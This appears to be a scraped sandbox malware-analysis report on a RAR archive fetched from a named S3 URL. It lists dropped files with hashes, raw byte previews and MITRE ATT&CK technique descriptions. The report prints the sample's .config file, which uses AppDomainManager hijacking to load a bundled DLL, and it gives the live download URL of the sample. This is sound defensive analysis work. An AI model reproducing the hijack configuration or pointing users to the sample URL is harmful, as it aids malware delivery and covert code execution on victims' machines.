Preview:	L..................F.@.. ...$+.,.........a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.>....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.>....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.>..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.>...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 06:48:42 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.00131576648065
Encrypted:	false
SSDEEP:
MD5:	53314F95200601DE6D207F5871D327B9
SHA1:	4D2C3820C166B4A0A3478AAA898656A10FFA23D7
SHA-256:	F85D57EAC815AAA5E8DEB3FF7FBE553F46A7D64B7932F48161AB8FD8E943F423
SHA-512:	A8436A75ABFFEC94B3AF71C6DCD22793CA28BB15B03EE71DE9AC803A1EB4F6F8365C1270CA0DFF2C5D9E40F729F3B27F41C6898FAC89E83FB7C9DE507024CCE6
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.... ....a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.>....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.>....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.>..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.>...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\Downloads\.....rar (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	29F37FF796320E32CE791F1840F964DF
SHA1:	B1144BC81838AF336186B31C336CA46109B755E6
SHA-256:	658FEB0EBC6D94CC54F67BBD60172B8190087BDC3B8229012DD245E334A47239
SHA-512:	E145292956B5C23857371077A259462AC8B796D24E79EF91FC116D770185932A03F29E43B3EC93DFB54B4FD66281A51C9BD5007948D3D20D83790F6E3EB961AB
Malicious:	false
Reputation:	unknown
Preview:	Rar!....p...............s..:......... Rt.t........./20250108.exe.....!'......VLpvDT"v`P6W...0."@..@.... . .../..e!p.PLPPTPTf.!.}. ."...#.."H..3......;..........]...7WW./....uuU}}....].b..... .H.0+.fdG......G@Gd.#^..i.O...a.yW.I.<e`."."K.A.\|.T~\|....T}.T/..............hh.k.;.i.. ..5.m.EH...I..irMKSy..v.z..<....T.....F.HoOz{..........c..........G.8a....!.%.\...F......id.oU.GT8)...x.Qw.^.c.\|sis..u.....X...W....E.....jrD.........#.AYa..........G.7.....(.......I....BH..$...lBa...w"..P.../...!8q.!.....(..J.^1T...t....K..!..}....W...Q.6.....@=...B.....u...!....fM5...U/..f.k.5N..iLo1.r...Q.K...`...0...i..+.<-.X:.~$kl..@.&.{x.oG7f..Y..5J.%p..93[./...3&...^....%=....E;F...-..5v..A./.RO.o.4.M#.S.<5s.]zC;P.......$A.J..Z.r...^I@:M.5......h%?d\|M..9..I.5.e.(....v....!@....4.....]*V#.4.X..4....C..[Q......U7..F.\..C6...z.l7..C/.u..........B ,._.P..M#...#..b1#..%$. J...F...U%....[..x.....h..hi.......Z.....{.%..c...J.2..A......._.5..QCV H..(\|....I.`....

C:\Users\user\Downloads\.....rar.crdownload (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	F9A6894970C34D34A247EABD643444EF
SHA1:	A7B649D05F32F4D44EBDA30BF31A8C237359C95B
SHA-256:	493A9F241F43DEF2E9251A4DBA80DC1DF372BC136C026D4661B7414551150BF0
SHA-512:	68E3B177148258A758075DDFF07696CAE078265B6C75A4AD442ACBC28B4E0BC232257DB6EC4FCDF89F46E3C5BD7504890CA1CA314F171341BE02F5ADCCE8B83A
Malicious:	false
Reputation:	unknown
Preview:	Rar!....p...............s..:......... Rt.t........./20250108.exe.....!'......VLpvDT"v`P6W...0."@..@.... . .../..e!p.PLPPTPTf.!.}. ."...#.."H..3......;..........]...7WW./....uuU}}....].b..... .H.0+.fdG......G@Gd.#^..i.O...a.yW.I.<e`."."K.A.\|.T~\|....T}.T/..............hh.k.;.i.. ..5.m.EH...I..irMKSy..v.z..<....T.....F.HoOz{..........c..........G.8a....!.%.\...F......id.oU.GT8)...x.Qw.^.c.\|sis..u.....X...W....E.....jrD.........#.AYa..........G.7.....(.......I....BH..$...lBa...w"..P.../...!8q.!.....(..J.^1T...t....K..!..}....W...Q.6.....@=...B.....u...!....fM5...U/..f.k.5N..iLo1.r...Q.K...`...0...i..+.<-.X:.~$kl..@.&.{x.oG7f..Y..5J.%p..93[./...3&...^....%=....E;F...-..5v..A./.RO.o.4.M#.S.<5s.]zC;P.......$A.J..Z.r...^I@:M.5......h%?d\|M..9..I.5.e.(....v....!@....4.....]*V#.4.X..4....C..[Q......U7..F.\..C6...z.l7..C/.u..........B ,._.P..M#...#..b1#..%$. J...F...U%....[..x.....h..hi.......Z.....{.%..c...J.2..A......._.5..QCV H..(\|....I.`....

C:\Users\user\Downloads\87319bc0-1889-4f70-9b17-541c4de1dff5.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	16970
Entropy (8bit):	7.988054772044822
Encrypted:	false
SSDEEP:
MD5:	F9A6894970C34D34A247EABD643444EF
SHA1:	A7B649D05F32F4D44EBDA30BF31A8C237359C95B
SHA-256:	493A9F241F43DEF2E9251A4DBA80DC1DF372BC136C026D4661B7414551150BF0
SHA-512:	68E3B177148258A758075DDFF07696CAE078265B6C75A4AD442ACBC28B4E0BC232257DB6EC4FCDF89F46E3C5BD7504890CA1CA314F171341BE02F5ADCCE8B83A
Malicious:	false
Reputation:	unknown
Preview:	Rar!....p...............s..:......... Rt.t........./20250108.exe.....!'......VLpvDT"v`P6W...0."@..@.... . .../..e!p.PLPPTPTf.!.}. ."...#.."H..3......;..........]...7WW./....uuU}}....].b..... .H.0+.fdG......G@Gd.#^..i.O...a.yW.I.<e`."."K.A.\|.T~\|....T}.T/..............hh.k.;.i.. ..5.m.EH...I..irMKSy..v.z..<....T.....F.HoOz{..........c..........G.8a....!.%.\...F......id.oU.GT8)...x.Qw.^.c.\|sis..u.....X...W....E.....jrD.........#.AYa..........G.7.....(.......I....BH..$...lBa...w"..P.../...!8q.!.....(..J.^1T...t....K..!..}....W...Q.6.....@=...B.....u...!....fM5...U/..f.k.5N..iLo1.r...Q.K...`...0...i..+.<-.X:.~$kl..@.&.{x.oG7f..Y..5J.%p..93[./...3&...^....%=....E;F...-..5v..A./.RO.o.4.M#.S.<5s.]zC;P.......$A.J..Z.r...^I@:M.5......h%?d\|M..9..I.5.e.(....v....!@....4.....]*V#.4.X..4....C..[Q......U7..F.\..C6...z.l7..C/.u..........B ,._.P..M#...#..b1#..%$. J...F...U%....[..x.....h..hi.......Z.....{.%..c...J.2..A......._.5..QCV H..(\|....I.`....

C:\Users\user\Downloads\????.rar.crdownload

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	199803
Entropy (8bit):	7.99908423662709
Encrypted:	true
SSDEEP:
MD5:	29F37FF796320E32CE791F1840F964DF
SHA1:	B1144BC81838AF336186B31C336CA46109B755E6
SHA-256:	658FEB0EBC6D94CC54F67BBD60172B8190087BDC3B8229012DD245E334A47239
SHA-512:	E145292956B5C23857371077A259462AC8B796D24E79EF91FC116D770185932A03F29E43B3EC93DFB54B4FD66281A51C9BD5007948D3D20D83790F6E3EB961AB
Malicious:	false
Reputation:	unknown
Preview:	Rar!....p...............s..:......... Rt.t........./20250108.exe.....!'......VLpvDT"v`P6W...0."@..@.... . .../..e!p.PLPPTPTf.!.}. ."...#.."H..3......;..........]...7WW./....uuU}}....].b..... .H.0+.fdG......G@Gd.#^..i.O...a.yW.I.<e`."."K.A.\|.T~\|....T}.T/..............hh.k.;.i.. ..5.m.EH...I..irMKSy..v.z..<....T.....F.HoOz{..........c..........G.8a....!.%.\...F......id.oU.GT8)...x.Qw.^.c.\|sis..u.....X...W....E.....jrD.........#.AYa..........G.7.....(.......I....BH..$...lBa...w"..P.../...!8q.!.....(..J.^1T...t....K..!..}....W...Q.6.....@=...B.....u...!....fM5...U/..f.k.5N..iLo1.r...Q.K...`...0...i..+.<-.X:.~$kl..@.&.{x.oG7f..Y..5J.%p..93[./...3&...^....%=....E;F...-..5v..A./.RO.o.4.M#.S.<5s.]zC;P.......$A.J..Z.r...^I@:M.5......h%?d\|M..9..I.5.e.(....v....!@....4.....]*V#.4.X..4....C..[Q......U7..F.\..C6...z.l7..C/.u..........B ,._.P..M#...#..b1#..%$. J...F...U%....[..x.....h..hi.......Z.....{.%..c...J.2..A......._.5..QCV H..(\|....I.`....

C:\Users\user\Downloads\?????\20250108.exe

Download File

Process:	C:\Program Files\7-Zip\7zG.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	55808
Entropy (8bit):	5.454514251686475
Encrypted:	false
SSDEEP:
MD5:	B54F6F7A63A0E20DE1A80D1C8AAA2882
SHA1:	87219685412BD05E56DAE1162108087872DB5357
SHA-256:	0BE7F413037A2192E3361954867B09DE0568FF53A938F73DD8BA1BDCE05C7002
SHA-512:	908FD0444E43438AD563AED947302A8F3AE4F6AB35B115137D137F27DB932AC2B5F21658C1E04297A5A4347029B23A0645B37B87B8687A4B9D7F92BFF38B34B3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m{(..........."...0..(..........BG... ...`....@.. .......................@......{.....`..................................F..O....`..,.................... ......8F..8............................................ ............... ..H............text...H'... ...(.................. ..`.rsrc...,....`.....................@..@.reloc....... ......................@..B................$G......H........&...............B...............................................0..........r...ps.......(....(..... o....(.....o......o....s....}.....{....r5..po....(....:.....rG..p(........~....(....,^~....r{..p..#...o....&.. .... `....(........,0~....(....r...p..#...%....1....(......#...o....&(....o ........rK..p..s!.........o"...&.-%~....rc..p..#...o....&(....o ........(....,%~....r...p..#...o....&(....o .......(#...-~....r...p..#...o....&(....(....o ....Z...~....r}..p..#...o.

C:\Users\user\Downloads\?????\20250108.exe.config

Download File

Process:	C:\Program Files\7-Zip\7zG.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	375
Entropy (8bit):	4.9423643714213865
Encrypted:	false
SSDEEP:
MD5:	C2DDF915F0A5D4082DE665065C4A1490
SHA1:	35B00DF2388155221AD1B22ECA29808D1335E493
SHA-256:	66C8FB8B9BFE684F3547A0CD3C3407CC6561A5152577A296A795427D948C7F2E
SHA-512:	263D7A0651EC7F2081B20EBAD4A92D055CFB6548C174EB55F3F06161B5F46DF88045725440B11A9A656A5DEF2FC3D1E52896C77CAB357AA69CEDB6467CD6B72E
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration> .. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/> .. </startup> .. <runtime> .. <appDomainManagerAssembly value="l, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" /> .. <appDomainManagerType value="MyAppDomainManager" /> .. </runtime></configuration>

C:\Users\user\Downloads\?????\l.dll

Download File

Process:	C:\Program Files\7-Zip\7zG.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	179712
Entropy (8bit):	7.9589755021060915
Encrypted:	false
SSDEEP:
MD5:	F272E03CC01F612C9E8EFFADC0B0D860
SHA1:	D990DC5FE5B9ACF38D27DC438798D75F90EAF193
SHA-256:	06A8E8FE18CAE75E13C79DE977CE814FA8A08CC57828D07BEDC4415CD16366C9
SHA-512:	2F0A0D30E894AA72F94577191C14A6FF85636CC05C9C78566B545C9F2B48925463DA37EB48B9EF448F8BDAA39CE7D1672A855C11301D04D51F79181100A411D4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....wu..........." ..0...................... ....... .......................@............`.................................P...K.......L.................... ..........................................................................H............[.kM.S...... ......................@....text............................... ..`.rsrc...L...........................@..@.................................... ..`.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

⊘No static file info

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

LLM Input / Output

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\Public\Documents\1.jpg

C:\Users\Public\Documents\1.reg

C:\Users\Public\Documents\2.jpg

C:\Users\Public\Documents\upda.txt

C:\Users\Public\Documents\update.bat

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqr4ubdv.yqs.psm1

C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SO4S13NB6V6I7YQ3E5SL.temp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

C:\Users\user\Downloads\.....rar (copy)

C:\Users\user\Downloads\.....rar.crdownload (copy)

C:\Users\user\Downloads\87319bc0-1889-4f70-9b17-541c4de1dff5.tmp

C:\Users\user\Downloads\????.rar.crdownload

C:\Users\user\Downloads\?????\20250108.exe

C:\Users\user\Downloads\?????\20250108.exe.config

C:\Users\user\Downloads\?????\l.dll

Static File Info

Windows Analysis Report
https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar